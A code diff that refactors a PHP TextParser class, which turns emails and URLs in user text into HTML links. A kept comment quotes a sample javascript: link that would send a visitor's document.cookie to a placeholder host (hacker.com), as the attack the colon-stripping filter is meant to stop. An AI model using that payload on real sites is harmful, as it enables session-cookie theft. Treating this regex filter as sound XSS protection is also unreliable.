@@ -8,43 +8,54 @@ class TextParser
88{
99 public function __invoke (string $ text ): string
1010 {
11- // bug in PHP? get rid of newlines at the beginning of text
1211 $ text = ltrim ($ text );
13-
14- // make urls and emails clickable
15- $ text = preg_replace ("/([\._a-z0-9-]+@[\.a-z0-9-]+)/i " , '<a href="mailto: \\1" class="email"> \\1</a> ' , $ text );
16- $ link_pattern = "/(.*)<a.*href\s*=\s* \"(.*?) \"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is " ;
17-
18- $ i = 0 ;
19- while (preg_match ($ link_pattern , $ text , $ matches )) {
12+ $ text = preg_replace (
13+ "/([\._a-z0-9-]+@[\.a-z0-9-]+)/i " ,
14+ '<a href="mailto: \\1" class="email"> \\1</a> ' ,
15+ $ text ,
16+ );
17+ $ linkPattern = "/(.*)<a.*href\s*=\s* \"(.*?) \"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is " ;
18+ $ link = [];
19+ $ index = 0 ;
20+ while (preg_match ($ linkPattern , $ text , $ matches )) {
2021 $ url = $ matches [2 ];
2122 $ rest = $ matches [3 ];
2223 if (!preg_match ('/^(http:)|(mailto:)|(ftp:)|(https:)/i ' , $ url )) {
2324 // avoid this
2425 //<a href="javascript:window.open('http://hacker.com?cookie='+document.cookie)">
2526 $ url = preg_replace ('/:/ ' , '' , $ url );
2627 }
27- $ link [$ i ] = '<a href=" ' .$ url .'" ' .$ rest .'> ' .$ matches [4 ].'</a> ' ;
28- $ text = $ matches [1 ]."%% $ i %% " .$ matches [5 ];
29- ++$ i ;
28+ $ link [$ index ] = '<a href=" ' .$ url .'" ' .$ rest .'> ' .$ matches [4 ].'</a> ' ;
29+ $ text = $ matches [1 ]."%% $ index %% " .$ matches [5 ];
30+ ++$ index ;
3031 }
3132
32- $ text = preg_replace ("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " , 'http:// \\1 ' , $ text ); //make www. -> http://www.
33- $ text = preg_replace ("/(https?:\/\/)http?:\/\//i " , '\\1 ' , $ text ); //take out duplicate schema
34- $ text = preg_replace ("/(ftp:\/\/)http?:\/\//i " , '\\1 ' , $ text ); //take out duplicate schema
35- $ text = preg_replace ("/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " ,
33+ //make www. -> http://www.
34+ $ text = preg_replace ("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " , 'http:// \\1 ' , $ text );
35+ //take out duplicate schema
36+ $ text = preg_replace ("/(https?:\/\/)http?:\/\//i " , '\\1 ' , $ text );
37+ $ text = preg_replace ("/(ftp:\/\/)http?:\/\//i " , '\\1 ' , $ text );
38+ //eg-- http://kernel.org -> <a href"http://kernel.org" target="_blank">http://kernel.org</a>
39+ $ text = preg_replace (
40+ "/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_ \\-]+)/i " ,
3641 '<a href=" \\1 \\2" class="url" target="_blank"> \\2</a> ' ,
37- $ text ); //eg-- http://kernel.org -> <a href"http://kernel.org" target="_blank">http://kernel.org</a>
38-
39- $ text = preg_replace ("/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@! \\-_]+)/i " ,
42+ $ text
43+ );
44+ //eg -- http://www.google.com -> <a href"http://www.google.com" target="_blank">www.google.com</a>
45+ $ text = preg_replace (
46+ "/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@! \\-_]+)/i " ,
4047 '<a href=" \\1 \\2 \\3" class="url" target="_blank"> \\2 \\3</a> ' ,
41- $ text ); //eg -- http://www.google.com -> <a href"http://www.google.com" target="_blank">www.google.com</a>
48+ $ text
49+ );
4250
4351 // take off a possible last full stop and move it outside
44- $ text = preg_replace ("/<a href= \"(.*?)\. \" class= \"url \" target= \"_blank \">(.*)\.<\/a>/i " ,
45- '<a href=" \\1" class="url" target="_blank"> \\2</a>. ' , $ text );
52+ $ text = preg_replace (
53+ "/<a href= \"(.*?)\. \" class= \"url \" target= \"_blank \">(.*)\.<\/a>/i " ,
54+ '<a href=" \\1" class="url" target="_blank"> \\2</a>. ' ,
55+ $ text
56+ );
4657
47- for ($ j = 0 ; $ j < $ i ; ++$ j ) {
58+ for ($ j = 0 ; $ j < $ index ; ++$ j ) {
4859 $ replacement = $ link [$ j ];
4960 $ text = preg_replace ("/\%\% $ j\%\%/ " , $ replacement , $ text );
5061 }
@@ -68,6 +79,7 @@ public function __invoke(string $text): string
6879 // reverse our previous placeholders
6980 $ text = str_replace ('<!--LB--> ' , '( ' , $ text );
7081 $ text = str_replace ('<!--RB--> ' , ') ' , $ text );
82+
7183 return str_replace ('<!--DOLL--> ' , '$ ' , $ text );
7284 }
7385}
0 commit comments